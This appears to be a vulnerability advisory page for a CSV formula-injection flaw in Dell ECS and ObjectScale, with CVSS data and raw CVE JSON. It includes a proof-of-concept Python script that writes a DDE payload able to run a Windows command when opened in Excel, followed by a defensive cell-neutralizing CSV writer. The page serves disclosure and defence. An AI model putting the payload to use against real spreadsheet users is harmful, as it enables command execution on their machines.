Security Vulnerability Report
CVE-2026-35157 CVSS 5.8 MEDIUM


Published: 2026-05-11 10:16:13
Last Modified: 2026-05-11 10:16:13

Description

Dell ECS versions 3.8.1.0 through 3.8.1.7 and Dell ObjectScale versions prior to 4.3.0.0 contain an improper neutralization of formula elements in a CSV file vulnerability in the UI. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution.

CVSS Details

CVSS Score: 5.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Dell ECS 3.8.1.0 - 3.8.1.7
Dell ObjectScale < 4.3.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Example: CSV Injection Payload Generation
# Target: Dell ECS / ObjectScale UI
import csv

def generate_malicious_csv(filename):
    # Malicious payload to execute calc.exe on Windows when opened in Excel
    # Attackers can replace this with downloading a shell, etc.
    payload = '=cmd|\' /C calc\'!A0'

    # Simulating data that might be injected via the UI (e.g., Username, Object Name)
    data = [
        ['ID', 'UserName', 'Description'],
        ['1', 'admin', 'Normal User'],
        ['2', payload, 'Injected Payload']
    ]

    with open(filename, 'w', newline='', encoding='utf-8') as file:
        writer = csv.writer(file)
        writer.writerows(data)

    print(f"[+] Generated malicious CSV file: {filename}")
    print(f"[+] Payload injected: {payload}")

if __name__ == "__main__":
    generate_malicious_csv("exploit.csv")
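The export-side counterpart to the generator above, as an added example (not code from the original page and not Dell's fix): a CSV writer that neutralizes formula elements (CWE-1236) before user-controlled fields reach a spreadsheet. The names `neutralize_cell`, `export_rows` and `SAMPLE_ROWS` are hypothetical, and the sample rows are constructed.

```python
import csv
import io
import re

# A leading '=', '+', '-' or '@' makes a spreadsheet evaluate the cell.
# Leading tab / carriage return are also flagged, following OWASP's
# CSV injection guidance.
FORMULA_PREFIXES = ("=", "+", "-", "@")
CONTROL_PREFIXES = ("\t", "\r")
# Plain signed numbers are safe and stay untouched so numeric columns survive.
PLAIN_NUMBER = re.compile(r"[+-]?\d+(\.\d+)?")


def neutralize_cell(value):
    """Return the value as text that a spreadsheet will not evaluate."""
    text = "" if value is None else str(value)
    if PLAIN_NUMBER.fullmatch(text):
        return text
    # Leading whitespace is ignored for the check because some importers trim it.
    if text.startswith(CONTROL_PREFIXES) or text.lstrip().startswith(FORMULA_PREFIXES):
        # A leading apostrophe forces the cell to be read as a literal string.
        return "'" + text
    return text


def export_rows(rows):
    """Serialize rows to CSV text with every field neutralized and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample: fields a UI might accept from users and later export.
SAMPLE_ROWS = [
    ["ID", "UserName", "Description"],
    ["1", "admin", "Normal User"],
    ["2", "=1+1", "formula in a name field"],
    ["3", "  @SUM(A1)", "formula hidden behind spaces"],
    ["4", "-5", "legitimate negative number"],
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS), end="")
```

The apostrophe prefix changes the stored text, so consumers that parse the export programmatically need to know about it; the alternative is rejecting such values at input time.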

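References

https://www.dell.com/support/kbdoc/en-us/000462117/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities-1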

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35157", "sourceIdentifier": "[email protected]", "published": "2026-05-11T10:16:13.490", "lastModified": "2026-05-11T10:16:13.490", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell ECS versions 3.8.1.0 through 3.8.1.7 and Dell ObjectScale versions prior to 4.3.0.0, contains an improper neutralization of formula elements in a CSV File vulnerability in the UI. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1236"}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000462117/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities-1", "source": "[email protected]"}]}}